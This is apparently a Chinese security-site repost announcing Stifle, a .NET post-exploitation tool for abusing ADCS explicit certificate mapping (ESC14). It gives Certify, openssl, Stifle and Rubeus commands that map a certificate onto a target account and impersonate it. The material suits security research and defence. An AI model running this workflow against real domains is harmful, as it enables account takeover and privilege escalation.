.NET 后利用实用程序,用于滥用 ADCS 中的显式证书映射

admin 2025年4月8日20:22:54评论2 views字数 1460阅读4分52秒阅读模式
.NET 后利用实用程序,用于滥用 ADCS 中的显式证书映射

描述

大约一年前,SpecterOps 的Jonas Knudsen( @Jonas_B_KaltSecurityIdentities )发表了一篇题为“ADCS ESC14 滥用技术”的博客,介绍了一种利用 Active Directory 证书服务 (ADCS) 通过显式证书映射进行多种类型帐户接管的已知技术。他发布了一组用于生成和写入属性的 PowerShell 工具,作为滥用技术的主要变体。由于这种技术可以看作是持有对象写入原语时接管帐户的第三种主要方法(与 RBCD 和 Shadow Credentials 一起),我认为它需要自己的 .NET 工具,因为我注意到过去一年中没有发布过一个版本。

介绍 Stifle,一个非常简单的 .NET 后利用实用程序,它使用传递的证书在目标对象上设置显式证书映射,允许使用已持有的映射证书作为目标对象进行身份验证。

_______  ___  / ____| | (_)/ _| || (___ ||_ _||_|| ___  ___ | __| |_| |_  ____| |_| || || __/ |_____/ __|_|_| |_|___| [*] Exploit explicit certificate mapping in Active Directory [*] Add an explicit certificate mapping on a target object by writing the required altSecurityIdentities value using a certificate and the certificate password:        Stifle.exe add /object:target /certificate:MIIMrQI... /password:P@ssw0rd [*] Clear the altSecurityIdentities attribute, removing the explicit certificate mapping:        Stifle.exe clear /object:target

使用

首先使用 Certify 请求目标对象将映射到的证书(注意,请求的证书必须是机器帐户证书):

Certify.exe request /ca:lab.lanlab-dc01-ca /template:Machine /machine
.NET 后利用实用程序,用于滥用 ADCS 中的显式证书映射

然后将证书信息复制到.pem文件中,并使用基于 unix 的系统上的 openssl 二进制文件转换为 base64.pfx格式:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export | base64 -w 0
接下来将导出的证书和导出的证书密码复制到Stifle中,它会生成一个证书映射字符串并将其写入目标对象altSecurityIdentities属性中:
Stifle.exeadd /object:target /certificate:MIIMrQI... /password:P@ssw0rd
.NET 后利用实用程序,用于滥用 ADCS 中的显式证书映射
最后使用 PKINIT 身份验证请求 TGT,使用 Rubeus 有效地模拟目标用户:
Rubeus.exeasktgt /user:target /certificate:MIIMrQI... /password:P@ssw0rd
.NET 后利用实用程序,用于滥用 ADCS 中的显式证书映射
项目地址:
https://github.com/logangoins/Stifle

原文始发于微信公众号(Ots安全):.NET 后利用实用程序,用于滥用 ADCS 中的显式证书映射

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月8日20:22:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   .NET 后利用实用程序,用于滥用 ADCS 中的显式证书映射https://cn-sec.com/archives/3930299.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息